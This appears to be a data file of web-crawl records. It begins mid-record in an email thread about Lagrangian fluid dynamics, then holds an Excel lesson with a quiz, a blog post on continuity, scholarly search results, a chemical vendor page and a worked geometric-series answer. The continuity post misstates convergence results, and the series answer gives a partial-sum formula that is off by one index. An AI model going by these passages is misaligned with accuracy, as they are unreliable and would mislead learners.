consistently.\n\nSo the question is where to take the conditions for R_r that must appear as a constraint in the Lagrange mechanism. The generalized coordinates should be r and theta, but what is the kinetic energy? Let’s assmume that the velocity, eqs.(26,27) of the note, is that derived from the coordinate transformation. Then the Euler-Lagrange equations (33,34) are correct, although they contain an unspecified function R_r (which is not time dependent).\n\nI do not understand the part of the note after eqs.(33,34). Why do you introduce the Lagrangian (35)? Obviously this belongs to a different problem to be solved. And why should it be re-expressed to (36)? The momentum in Lagrange theory is a generalized momentum and needs not have the form (37).\n\nOn page 6 of the manuscript I cannot decipher the sentence “It is not possible to choose … as Lagrange varibles”. Which variables do you mean?\nEqs. (44) and (45) are derived from the same Euler-Lagrange equation and are not independent. It is true that (45) is a constant of motion but this is not suited for solving the equations because it is only of first order. What about using\n\nH = 1/2 m v^2 + U(r) = const.\n\ninstead? Then we can determine partial R_r/partial r , and replace it in (43,44) so that we have only derivatives of time and the equation system could be solved by Maxima for example. In general, combination of Lagrange theory (which is for mass points primarily) and fluid dynamics (which is for distributed fields) may be a bit tricky.\n\nSorry for having written such a long sermon today.\nHorst\n\nAm 28.03.2017 um 10:44 schrieb EMyrone:\n\nThis note shows that the complete Lagrangian and Hamiltonian formulations are needed to describe fluid dynamics self consistently. When this is done UFT363 is slighly corrected to Eqs. (43) to (45), which can be solved simultaneously using Maxima to give the orbit and spin connection.\n\n### Chapter 5 of ECE2 and UFT373 in Spanish\n\nWednesday, March 29th, 2017\n\nMany thanks again!\n\nIn a message dated 28/03/2017 21:16:10 GMT Daylight Time, [email protected] writes:\n\nDone today\n\nDave\n\nOn 3/26/2017 12:36 PM, Alex Hill (ET3M) wrote:\n\nHello Dave,\n\nPlease find enclosed the Spanish version of Chapter 5 of the ECE2 book in pdf file, which I hope you can attach to the existing ECE2 Ch 1 to 4 pdf file in Spanish, since all five chapters are too heavy a file to mail by Yahoo.\n\nI am also enclosing the recent UFT373 file in Spanish, for posting.\n\nThanks.\n\nRegards," ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91126555,"math_prob":0.8879156,"size":26950,"snap":"2023-14-2023-23","text_gpt3_token_len":6795,"char_repetition_ratio":0.13133675,"word_repetition_ratio":0.50653666,"special_character_ratio":0.26482373,"punctuation_ratio":0.13531724,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9641215,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-07T23:01:08Z\",\"WARC-Record-ID\":\"<urn:uuid:10683f49-0e45-42b3-8ba8-334ca2891a20>\",\"Content-Length\":\"58639\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f456fc8f-381b-4874-ae56-13d79c53ef1b>\",\"WARC-Concurrent-To\":\"<urn:uuid:ab8188d3-a64b-478f-aedc-4a5dd50bfa41>\",\"WARC-IP-Address\":\"67.231.254.154\",\"WARC-Target-URI\":\"http://aias.us/blog/index3df6.html?m=201703\",\"WARC-Payload-Digest\":\"sha1:PP2D32MFUWNSOUJ2DMUUWDDKTJYGSQ2W\",\"WARC-Block-Digest\":\"sha1:JFLBEIVOCHSZ4S7HVDQZ2KPUSFRF26AE\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224654016.91_warc_CC-MAIN-20230607211505-20230608001505-00337.warc.gz\"}"}
http://academic.pgcc.edu/~bspear/IntroMsOffice/AUTOptn/excel3/lesson3.htm
[ "### Programs: Microsoft Excel Chapter 3", null, ": Lesson 3", null, "Lesson #3: In this lesson you will learn how use Autofill and how to use the Pointing function.\n\nMain Objectives:\n• Autofill (Fill Handle)\n• Pointing\nAutofill and Pointing\nObjective # 1 Autofill", null, "Purpose nTo copy a cell or range of cells to an adjacent cell or range of cells To Use n-Select which cell you would like to copy. n-Point to the black square on the lower-right corner of the cell until the mouse changes shape. nDrag the mouse to the desired range you would like to copy the cells to. nA boarder should now appear around the area you would like to be copied. nThe process is now done once you unclick the mouse\nObjective # 2 Pointing", null, "Purpose: nTo make it easier not to make a mistake when typing a formula into a cell To use: nClick the cell in which you want to put the formula in. nType an equal sign (=).  The status bar should now say ‘enter mode.’ You can now continue to type the rest of the formula. n nPoint to the cell in which you want to reference the formula.  A border should appear around the cell and in the status bar, the words ‘point mode’ should appear. nNow you can continue to type in arithmetic operators to place the references in the formula.\n\nAfter completing the DEMO PROBLEM you will have enough visual basis and knowledge to work alone with excel in similar situation.\n\nExercises\n\n1. Excel is able to make a series of numbers and certain words\n\nTrue        False\n\n2. Arguments are when the computer is asked to do two things at once and it can’t decide which function to do\n\nTrue        False\n\n3. We use pointing so we make less mistakes\n\nTrue        False\n\n4. When using the fill handle we use the lower left corner to drag\n\nTrue        False\n\n5. You are in pointing mode when a moving box appears around the cell/s you selected\n\nTrue        False\n\n`1.The fill handle is the quickest way to copy a cell to where? `\n` a) The cells in A1`\n` b) The cells that are adjacent to the cell your working with`\n` c) The cells on a different excel document `\n` d) No cells are copied using the fill handle`\n\n`2.What is the first mode you should be in when you are pointing?`\n` a) Point mode`\n` b) Edit mode`\n` c) Enter mode`\n``` d) Ready mode\n```\n\n`3.What button do you push in the tool bar to access the Paste Function?`\n` a) Autosum (Sigma sign)`\n` b) Paste (clip board with little paper)`\n` c) Copy (two pieces of paper)`\n``` d) Insert Function (fx)\n```\n\n`4.What is the best way to average values in cells B1-B4?`\n` a) =B1+B2+B3+B4`\n` b) =Average(B1, B4)`\n` c) Neither a or b`\n``` d) both a and b are great ways to find the average\n```\n\n`5.5.Cells A1, A2 and A3 have the numbers 7, 10 and 1 respectively. If in A4 the function typed is =`\n`\tSum(A1: A3), then what will be the number that appears after you hit the `\n`\tenter key after the function?`\n` a) 3`\n` b) 18 `\n` c) 10`\n` d) 16`\n\n`6.6.When using the fill handle, what corner do you use to pull down to the range you would like?`\n` a) lower right`\n` b) lower left`\n` c) upper right`\n` d) upper left`\n\n[FrontPage Save Results Component]", null, "back to lesson #2\n\ncontinue to lesson #4", null, "", null, "Back to Lessons", null, "" ]
[ null, "http://academic.pgcc.edu/~bspear/IntroMsOffice/AUTOptn/excel3/r.gif", null, "http://academic.pgcc.edu/~bspear/IntroMsOffice/AUTOptn/excel3/excel.gif", null, "http://academic.pgcc.edu/~bspear/IntroMsOffice/AUTOptn/excel3/lesson6.jpg", null, "http://academic.pgcc.edu/~bspear/IntroMsOffice/AUTOptn/excel3/lesson7.jpg", null, "http://academic.pgcc.edu/~bspear/IntroMsOffice/AUTOptn/excel3/back.gif", null, "http://academic.pgcc.edu/~bspear/IntroMsOffice/AUTOptn/excel3/next.gif", null, "http://academic.pgcc.edu/~bspear/IntroMsOffice/AUTOptn/excel3/back.gif", null, "http://academic.pgcc.edu/~bspear/IntroMsOffice/AUTOptn/excel3/next.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7544894,"math_prob":0.6904983,"size":1443,"snap":"2019-13-2019-22","text_gpt3_token_len":431,"char_repetition_ratio":0.108408615,"word_repetition_ratio":0.0,"special_character_ratio":0.27165627,"punctuation_ratio":0.0743034,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9601897,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16],"im_url_duplicate_count":[null,2,null,2,null,1,null,1,null,4,null,4,null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-03-19T23:33:07Z\",\"WARC-Record-ID\":\"<urn:uuid:d9b7c1d4-ffb0-429d-9a1f-d9b97fc735c0>\",\"Content-Length\":\"31531\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:69ae88cb-8793-45c9-87c5-53cafdbbedf6>\",\"WARC-Concurrent-To\":\"<urn:uuid:916dd569-9c10-4016-8de7-debf63a3193b>\",\"WARC-IP-Address\":\"131.118.229.53\",\"WARC-Target-URI\":\"http://academic.pgcc.edu/~bspear/IntroMsOffice/AUTOptn/excel3/lesson3.htm\",\"WARC-Payload-Digest\":\"sha1:6WJVHCDHVI56NSUGUQMGE6NTNJ35BESV\",\"WARC-Block-Digest\":\"sha1:YDGP5GE3HKBZK4I7SN6F26WX5QFICMWD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-13/CC-MAIN-2019-13_segments_1552912202161.73_warc_CC-MAIN-20190319224005-20190320010005-00260.warc.gz\"}"}
https://math.portonvictor.org/2020/01/27/continuity-as-convergence-of-sequences-expanding-our-definition-of-continuity/
[ "", null, "# Continuity as Convergence of Sequences—Expanding Our Definition of Continuity\n\nI feel that continuity is best understood when we consider convergence at different levels of abstraction. While it’s fairly easy to understand the continuity of functions when they’re defined in spaces like R2, with standards like:\n\n• The left hand limit must equal the right hand limit.\n• The function should have a finite value at each point throughout any given domain.\n\nDefinitions like the ones I’ve mentioned above are also called definitions of continuity derived out of point-wise convergence. In general, a point-wise convergence definition of continuity looks something like this:\n\nThere are other more rigorous definitions for continuity, one of the common definitions that’s taught in beginner level calculus classes is:\n\nAll the conceptual analysis set aside, there are problems with these point-wise definitions of continuity and convergence because they don’t preserve boundedness or the continuity of functions. Anyone who’s taken higher level functional analysis would know that there are much more general definitions of continuity, which aren’t counter-intuitive or downright false.\n\nThese are called uniform-convergence definitions of continuity.\n\n## Uniform Convergence and Continuity\n\nTo be precise, uniform convergence directly implies continuity of the function across any domain or subset of the domain. This definition doesn’t take into account convergence of the values of x, rather, it looks at the convergence of sequences of functions. Put simply, if you can show that the function in question belongs to a sequence of functions that converge uniformly across any domain, then the function is continuous across the entire domain as well.  The formal definition is as follows:\n\nDefinition A: If a sequence {f\u001fn} of continuous functions fn: A→R converges uniformly on A⊂R to f: A→R, f is continuous on A.\n\nAs a method of proof, if you’re looking to prove that a certain function is continuous—all you need to prove is that the function in question belongs to a sequence of continuous functions on a domain A, which is a subset of the set of real numbers. Definition A, as I’ve written it above preserves the boundedness of sequences and preserves continuity in a way that’s not possible through the point-wise definition of convergence.\n\nThis definition A is a direct extension of Cauchy’s definition of uniform convergence, which is as follows:\n\nCauchy’s Definition of Uniform Convergence: A sequence {fn} of functions fn: A→ R is uniformly Cauchy on A if for every ε>0 there exists N∈N such that m, n>N implies that |fm(x) −fn(x)|<ε for all x∈ A.\n\nTo speak loosely, if the absolute difference between two successive functions belonging to the same sequence gets smaller, this implies that the sequence is converging. Assuming that such a convergence function exists, each function within the sequence is going to be continuous.\n\nIf you’re interested in studying continuity or the limits of functions, you should read Algebraic General Topology Volume 1. This book introduces my mathematical theory that generalizes limits across arbitrary discontinuous functions. As always, I’m open to new ideas and thoughts on my work and welcome open debate on any issue you find." ]
[ null, "https://i0.wp.com/math.portonvictor.org/wp-content/uploads/2020/01/Continuity-as-Convergence-of-Sequences-Expanding-Our-Definition-of-Continuity.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9094004,"math_prob":0.9518058,"size":3228,"snap":"2021-43-2021-49","text_gpt3_token_len":634,"char_repetition_ratio":0.1957196,"word_repetition_ratio":0.023715414,"special_character_ratio":0.18773234,"punctuation_ratio":0.086440675,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98244,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-11-29T08:04:55Z\",\"WARC-Record-ID\":\"<urn:uuid:5f5ad737-d924-41ac-9f0a-202a8dbc5c6f>\",\"Content-Length\":\"76254\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c2fe59c3-29b7-47de-ab5c-b098f21f99e6>\",\"WARC-Concurrent-To\":\"<urn:uuid:ed4a4ba2-b749-45e6-a1a5-e19ff9c9f081>\",\"WARC-IP-Address\":\"104.236.49.103\",\"WARC-Target-URI\":\"https://math.portonvictor.org/2020/01/27/continuity-as-convergence-of-sequences-expanding-our-definition-of-continuity/\",\"WARC-Payload-Digest\":\"sha1:KSVQWOWISOZYQBVBI44DZVLMNAOLEBD5\",\"WARC-Block-Digest\":\"sha1:XJC2IMJ5BFYLD34QONPLNYSV5FLUBZ3Q\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964358702.43_warc_CC-MAIN-20211129074202-20211129104202-00601.warc.gz\"}"}
https://scholar.archive.org/search?q=Enumeration+and+maximum+number+of+minimal+dominating+sets+for+chordal+graphs.
[ "Filters\n\n512 Hits in 6.3 sec\n\n### Minimal dominating sets in graph classes: Combinatorial bounds and enumeration\n\nJean-François Couturier, Pinar Heggernes, Pim van 't Hof, Dieter Kratsch\n2013 Theoretical Computer Science\nThere is a graph on n vertices with 15 n/6 minimal dominating sets. This gives a lower bound of 1.5704 n for the maximum number of minimal dominating sets.  ...  This gives a lower bound of 1.5704 n for the maximum number of minimal dominating sets. Graph classes Our work is dealing with some well-known graph classes.  ...\n\n### Enumerating minimal connected dominating sets in graphs of bounded chordality\n\nPetr A. Golovach, Pinar Heggernes, Dieter Kratsch\n2016 Theoretical Computer Science\nWe establish enumeration algorithms as well as lower and upper bounds for the maximum number of minimal connected dominating sets in such graphs.  ...  In particular, we present algorithms to enumerate all minimal connected dominating sets of chordal graphs in time O(1.7159 n ), of split graphs in time O(1.3803 n ), and of AT-free, strongly chordal, and  ...  In this paper we initiate the study of the enumeration and maximum number of minimal connected dominating sets in a given graph.  ...\n\n### Enumeration of Enumeration Algorithms [article]\n\nKunihiro Wasa\n2016 arXiv   pre-print\nIn this paper, we enumerate enumeration problems and algorithms. This survey is under construction. If you know some results not in this survey or there is anything wrong, please let me know.  ...  Reference 2.12.15 Enumeration of all minimal dominating sets in a chordal bipartite graph Input A chordal bipartite graph G. Output All minimal dominating sets in G.  ...  Reference 2.12.14 Enumeration of all minimal dominating sets in a P 6 -free chordal graph Input A P 6 -free chordal graph G = (V, E). Output All minimal dominating sets in G.  ...\n\n### A Note on the Maximum Number of Minimal Connected Dominating Sets in a Graph [article]\n\nFaisal N. Abu-Khzam\n2021 arXiv   pre-print\nThis improves the previously known lower bound of Ω(1.4422^n) and reduces the gap between lower and upper bounds for input-sensitive enumeration of minimal connected dominating sets in general graphs as  ...  We prove constructively that the maximum possible number of minimal connected dominating sets in a connected undirected graph of order n is in Ω(1.489^n).  ...  In this note we report an improved lower bound on the maximum number of minimal connected dominating sets in a graph.  ...\n\n### A Polynomial Delay Algorithm for Enumerating Minimal Dominating Sets in Chordal Graphs [article]\n\nMamadou Moustapha Kanté and Vincent Limouzy and Arnaud Mary and Lhouari Nourine and Takeaki Uno\n2014 arXiv   pre-print\nWe give a polynomial delay algorithm to list the set of minimal dominating sets in chordal graphs, an important and well-studied graph class where such an algorithm was open for a while.  ...  An output-polynomial algorithm for the listing of minimal dominating sets in graphs is a challenging open problem and is known to be equivalent to the well-known Transversal problem which asks for an output-polynomial  ...  For the enumeration of minimal dominating sets in chordal graphs the simplest strategy consists in following this ordering as follows.  ...\n\n### A Polynomial Delay Algorithm for Enumerating Minimal Dominating Sets in Chordal Graphs [chapter]\n\nMamadou Moustapha Kanté, Vincent Limouzy, Arnaud Mary, Lhouari Nourine, Takeaki Uno\n2016 Lecture Notes in Computer Science\nWe give a polynomial delay algorithm to list the set of minimal dominating sets in chordal graphs, an important and well-studied graph class where such an algorithm was open for a while.  ...  An output-polynomial algorithm for the listing of minimal dominating sets in graphs is a challenging open problem and is known to be equivalent to the well-known Transversal problem which asks for an output-polynomial  ...  For the enumeration of minimal dominating sets in chordal graphs the simplest strategy consists in following this ordering as follows.  ...\n\n### Minimal Dominating Sets in Graph Classes: Combinatorial Bounds and Enumeration [chapter]\n\nJean-François Couturier, Pinar Heggernes, Pim van't Hof, Dieter Kratsch\n2012 Lecture Notes in Computer Science\nFor several classes of graphs, we substantially improve the upper bound on the maximum number of minimal dominating sets in graphs on n vertices.  ...  For all considered graph classes, the upper bound proofs are constructive and can easily be transformed into algorithms enumerating all minimal dominating sets of the input graph.  ...  showed that all minimal dominating sets in a split graph G can be enumerated in time polynomial in the number of minimal dominating sets of G.  ...\n\n### On the maximum number of minimal connected dominating sets in convex bipartite graphs [article]\n\n2019 arXiv   pre-print\nOur algorithm implies a corresponding upper bound for the number of minimal connected dominating sets for this graph class.  ...  The enumeration of minimal connected dominating sets is known to be notoriously hard for general graphs.  ...  In this paper we study the enumeration and maximum number of minimal connected dominating sets in convex bipartite graphs, and we prove that the number of minimal connected dominating sets in a convex  ...\n\n### Enumeration and maximum number of minimal connected vertex covers in graphs\n\nPetr A. Golovach, Pinar Heggernes, Dieter Kratsch\n2018 European journal of combinatorics (Print)\nFor graphs of bounded chordality, we are able to give a better upper bound, and for chordal graphs and distance-hereditary graphs we are able to give tight bounds on the maximum number of minimal connected  ...  In this paper we show that the maximum number of minimal connected vertex covers of a graph is O(1.8668 n ), and these can be enumerated in time O(1.8668 n ).  ...  Examples of such recent results, both on general graphs and on some graph classes, concern the enumeration and maximum number of minimal dominating sets, minimal feedback vertex sets, minimal subset feedback  ...\n\n### Enumeration and Maximum Number of Minimal Connected Vertex Covers in Graphs [article]\n\nPetr A. Golovach, Pinar Heggernes, Dieter Kratsch\n2016 arXiv   pre-print\nFor graphs of chordality at most 5, we are able to give a better upper bound, and for chordal graphs and distance-hereditary graphs we are able to give tight bounds on the maximum number of minimal connected  ...  In this paper we show that the maximum number of minimal connected vertex covers of a graph is at most 1.8668^n, and these can be enumerated in time O(1.8668^n).  ...  Examples of such recent results, both on general graphs and on some graph classes, concern the enumeration and maximum number of minimal dominating sets, minimal feedback vertex sets, minimal subset feedback  ...\n\n### Subset feedback vertex sets in chordal graphs\n\nPetr A. Golovach, Pinar Heggernes, Dieter Kratsch, Reza Saei\n2014 Journal of Discrete Algorithms\nWe give an algorithm with running time O(1.6708 n ) that enumerates all minimal subset feedback vertex sets on chordal graphs on n vertices.  ...  We also obtain that a chordal graph G has at most 1.6708 n minimal subset feedback vertex sets, regardless of S .  ...  More recently, the maximum numbers and enumeration of objects like minimal dominating sets, minimal feedback vertex sets, minimal subset feedback vertex sets, minimal separators, and potential maximal  ...\n\n### On the Neighbourhood Helly of Some Graph Classes and Applications to the Enumeration of Minimal Dominating Sets [chapter]\n\nMamadou Moustapha Kanté, Vincent Limouzy, Arnaud Mary, Lhouari Nourine\n2012 Lecture Notes in Computer Science\nAs a consequence, we obtain output-polynomial time algorithms for enumerating the set of minimal dominating sets of line graphs and path graphs.  ...  Therefore, there exists an output-polynomial time algorithm that enumerates the set of minimal edge-dominating sets of any graph.  ...  We denote by D(G) the set of (inclusionwise) minimal dominating sets of a graph G.  ...\n\n### On Distance-d Independent Set and other problems in graphs with few minimal separators [article]\n\nPedro Montealegre, Ioan Todinca\n2016 arXiv   pre-print\nWe also provide polynomial algorithms for Connected Vertex Cover and Connected Feedback Vertex Set on subclasses of including chordal and circular-arc graphs, and we discuss variants of independent domination  ...  Fomin and Villanger (STACS 2010) proved that Maximum Independent Set, Feedback Vertex Set, and more generally the problem of finding a maximum induced subgraph of treewith at most a constant t, can be  ...  We thank Iyad Kanj for fruitful discussions on the subject.  ...\n\n### Counting the number of independent sets in chordal graphs\n\nYoshio Okamoto, Takeaki Uno, Ryuhei Uehara\n2008 Journal of Discrete Algorithms\nWe study some counting and enumeration problems for chordal graphs, especially concerning independent sets.  ...  With similar ideas, we show that enumeration (namely, listing) of the independent sets, the maximum independent sets, and the independent sets of a fixed size in a chordal graph can be done in constant  ...  Acknowledgement The authors thank Masashi Kiyomi for enlightening discussions and pointing out the work by Chang . The authors are grateful to L. Shankar Ram for pointing out a paper .  ...\n\n### Weighted domination of independent sets [article]\n\nRon Aharoni, Irina Gorelik\n2017 arXiv   pre-print\nThe independent domination number γ^i(G) of a graph G is the maximum, over all independent sets I, of the minimal number of vertices needed to dominate I.  ...  It is known abz that in chordal graphs γ^i is equal to γ, the ordinary domination number.  ...  We say that f is w-dominating if it w-dominates V . The independent domination number γ i w (G) is the maximum over all independent sets I of the minimal size of an integral function w-dominating I.  ...\n« Previous Showing results 1 — 15 out of 512 results" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8282111,"math_prob":0.96017027,"size":10148,"snap":"2022-40-2023-06","text_gpt3_token_len":2459,"char_repetition_ratio":0.2121451,"word_repetition_ratio":0.31411532,"special_character_ratio":0.23541585,"punctuation_ratio":0.15896104,"nsfw_num_words":5,"has_unicode_error":false,"math_prob_llama3":0.9751792,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-03T09:39:23Z\",\"WARC-Record-ID\":\"<urn:uuid:e2094408-e142-436b-a203-069697c7b746>\",\"Content-Length\":\"121074\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:eed705e4-aca5-4cdb-a3f0-73ff3a781268>\",\"WARC-Concurrent-To\":\"<urn:uuid:063dd4d8-cefa-4fdf-940b-60a02d91920b>\",\"WARC-IP-Address\":\"207.241.225.9\",\"WARC-Target-URI\":\"https://scholar.archive.org/search?q=Enumeration+and+maximum+number+of+minimal+dominating+sets+for+chordal+graphs.\",\"WARC-Payload-Digest\":\"sha1:Y3D4E4M7RCKPPZWU2VEJTBI2XESYIXTK\",\"WARC-Block-Digest\":\"sha1:6NSOCES3YLHDTHWRVMTAF3TBPKSLUV7P\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337404.30_warc_CC-MAIN-20221003070342-20221003100342-00729.warc.gz\"}"}
https://www.targetmol.com/compound/Indophagolin
[ "# Indophagolin\n\nCatalog No. T8946   CAS 1207660-00-1\n\nIndophagolin is a potent, indoline-containing autophagy inhibitor with IC50 of 140 nM. Indophagolin antagonizes the purinergic receptor P2X4 as well as P2X1 and P2X3 with IC50s of 2.71, 2.40 and 3.49 μM, respectively.\n\nAll products from TargetMol are for Research Use Only. Not for Human or Veterinary or Therapeutic Use.", null, "Indophagolin, CAS 1207660-00-1\nProduct consultation\nGet quote\nPurity: 98%\nBiological Description\nChemical Properties\nStorage & Solubility Information\n Description Indophagolin is a potent, indoline-containing autophagy inhibitor with IC50 of 140 nM. Indophagolin antagonizes the purinergic receptor P2X4 as well as P2X1 and P2X3 with IC50s of 2.71, 2.40 and 3.49 μM, respectively. Targets&IC50 P2X1:2.40μM , P2X3:3.49 μM , P2X4:2.71μM In vitro Indophagolin (10 μM) inhibits autophagosome formation in MCF7 cells.Indophagolin also antagonizes the Gq-protein-coupled P2Y4, P2Y6, and P2Y11 receptors (IC50s =3.4~15.4 μM). Indophagolin has a strong antagonistic effect on serotonin receptor 5-HT6 (IC50=1.0 μM) and a moderate effect on receptors 5-HT1B, 5-HT2B, 5-HT4e, and 5-HT7.\n Molecular Weight 523.75 Formula C19H15BrClF3N2O3S CAS No. 1207660-00-1\n\n#### Storage\n\nPowder: -20°C for 3 years\n\nIn solvent: -80°C for 2 years\n\n#### Solubility Information\n\nDMSO: 10 mM\n\n( < 1 mg/ml refers to the product slightly soluble or insoluble )\n\n## Related compound libraries\n\nThis product is contained In the following compound libraries:\n\n## Related Products\n\nRelated compounds with same targets\n\n##", null, "Dose Conversion\n\nYou can also refer to dose conversion for different animals. More\n\n##", null, "In vivo Formulation Calculator (Clear solution)\n\nStep One: Enter information below\nDosage\nmg/kg\nAverage weight of animals\ng\nDosing volume per animal\nul\nNumber of animals\nStep Two: Enter the in vivo formulation\n% DMSO\n%\n% Tween 80\n% ddH2O\n\n##", null, "Calculator\n\nMolarity Calculator\nDilution Calculator\nReconstitution Calculation\nMolecular Weight Calculator\n=\nX\nX\n\n### Molarity Calculator allows you to calculate the\n\n• Mass of a compound required to prepare a solution of known volume and concentration\n• Volume of solution required to dissolve a compound of known mass to a desired concentration\n• Concentration of a solution resulting from a known mass of compound in a specific volume\nSee Example\n\nAn example of a molarity calculation using the molarity calculator\nWhat is the mass of compound required to make a 10 mM stock solution in 10 ml of water given that the molecular weight of the compound is 197.13 g/mol?\nEnter 197.13 into the Molecular Weight (MW) box\nEnter 10 into the Concentration box and select the correct unit (millimolar)\nEnter 10 into the Volume box and select the correct unit (milliliter)\nPress calculate\nThe answer of 19.713 mg appears in the Mass box\n\nX\n=\nX\n\n### Calculator the dilution required to prepare a stock solution\n\nCalculate the dilution required to prepare a stock solution\nThe dilution calculator is a useful tool which allows you to calculate how to dilute a stock solution of known concentration. Enter C1, C2 & V2 to calculate V1.\n\nSee Example\n\nAn example of a dilution calculation using the Tocris dilution calculator\nWhat volume of a given 10 mM stock solution is required to make 20ml of a 50 μM solution?\nUsing the equation C1V1 = C2V2, where C1=10 mM, C2=50 μM, V2=20 ml and V1 is the unknown:\nEnter 10 into the Concentration (start) box and select the correct unit (millimolar)\nEnter 50 into the Concentration (final) box and select the correct unit (micromolar)\nEnter 20 into the Volume (final) box and select the correct unit (milliliter)\nPress calculate\nThe answer of 100 microliter (0.1 ml) appears in the Volume (start) box\n\n=\n/\n\n### Calculate the volume of solvent required to reconstitute your vial.\n\nThe reconstitution calculator allows you to quickly calculate the volume of a reagent to reconstitute your vial.\nSimply enter the mass of reagent and the target concentration and the calculator will determine the rest.\n\ng/mol\n\n### Enter the chemical formula of a compound to calculate its molar mass and elemental composition\n\nTip: Chemical formula is case sensitive: C10H16N2O2 c10h16n2o2\n\nInstructions to calculate molar mass (molecular weight) of a chemical compound:\nTo calculate molar mass of a chemical compound, please enter its chemical formula and click 'Calculate'.\nDefinitions of molecular mass, molecular weight, molar mass and molar weight:\nMolecular mass (molecular weight) is the mass of one molecule of a substance and is expressed n the unified atomic mass units (u). (1 u is equal to 1/12 the mass of one atom of carbon-12)\nMolar mass (molar weight) is the mass of one mole of a substance and is expressed in g/mol.\n\nbottom\n\n## Tech Support\n\nPlease see Inhibitor Handling Instructions for more frequently ask questions. Topics include: how to prepare stock solutions, how to store products, and cautions on cell-based assays & animal experiments, etc." ]
[ null, "https://www.targetmol.cn/file/group1/M00/cassfile/1207660-00-1.png", null, "https://www.targetmol.com/images/icons2/calculator.svg", null, "https://www.targetmol.com/images/icons2/calculator.svg", null, "https://www.targetmol.com/images/icons2/calculator.svg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7763908,"math_prob":0.92827445,"size":1637,"snap":"2023-14-2023-23","text_gpt3_token_len":578,"char_repetition_ratio":0.13288426,"word_repetition_ratio":0.3043478,"special_character_ratio":0.29260844,"punctuation_ratio":0.153125,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9598929,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,1,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-05T16:39:52Z\",\"WARC-Record-ID\":\"<urn:uuid:e3da06ed-f3bd-455f-9192-ac3a323a265c>\",\"Content-Length\":\"117841\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6a53bd99-7462-4a65-b91d-00b4439bd805>\",\"WARC-Concurrent-To\":\"<urn:uuid:7a908866-62c1-4a7c-8a48-fdc79415e9fb>\",\"WARC-IP-Address\":\"128.14.246.10\",\"WARC-Target-URI\":\"https://www.targetmol.com/compound/Indophagolin\",\"WARC-Payload-Digest\":\"sha1:N6UOT33NCRDNNDYR5UN6EGXSQA5NMPMN\",\"WARC-Block-Digest\":\"sha1:D5CYCQLLNI5CIVFTI5KRH63KY7QHC4XY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224652149.61_warc_CC-MAIN-20230605153700-20230605183700-00298.warc.gz\"}"}
https://socratic.org/questions/how-do-you-find-the-nth-partial-sum-determine-whether-the-series-converges-and-f-2
[ "# How do you find the nth partial sum, determine whether the series converges and find the sum when it exists given 1+3/4+9/16+...+(3/4)^n+...?\n\nJun 8, 2018\n\n${\\sum}_{k = 0}^{n} {\\left(\\frac{3}{4}\\right)}^{k} = 4 - 3 {\\left(\\frac{3}{4}\\right)}^{n - 1}$\n\n${\\sum}_{k = 0}^{\\infty} {\\left(\\frac{3}{4}\\right)}^{k} = 4$\n\n#### Explanation:\n\nThis is a geometric series of ratio $q = \\frac{3}{4}$.\n\nConsider the series:\n\n${\\sum}_{k = 0}^{\\infty} {q}^{k}$\n\nand its partial sum:\n\n${s}_{n} = {\\sum}_{k = 0}^{n} {q}^{k} = 1 + q + {q}^{2} + \\ldots + {q}^{n} = \\frac{{q}^{n + 1} - 1}{q - 1}$\n\nThen, if $\\left\\mid q \\right\\mid < 1$:\n\n${\\lim}_{n \\to \\infty} {s}_{n} = {\\lim}_{n \\to \\infty} \\frac{{q}^{n + 1} - 1}{q - 1} = \\frac{1}{1 - q}$\n\nFor $q = \\frac{3}{4}$:\n\n${s}_{n} = \\frac{{\\left(\\frac{3}{4}\\right)}^{n} - 1}{\\frac{3}{4} - 1} = \\frac{{3}^{n} - {4}^{n}}{{4}^{n} \\left(- \\frac{1}{4}\\right)} = \\frac{{4}^{n} - {3}^{n}}{4} ^ \\left(n - 1\\right) = 4 - 3 {\\left(\\frac{3}{4}\\right)}^{n - 1}$\n\nand:\n\n${\\sum}_{k = 0}^{\\infty} {\\left(\\frac{3}{4}\\right)}^{k} = 4$" ]
[ null ]
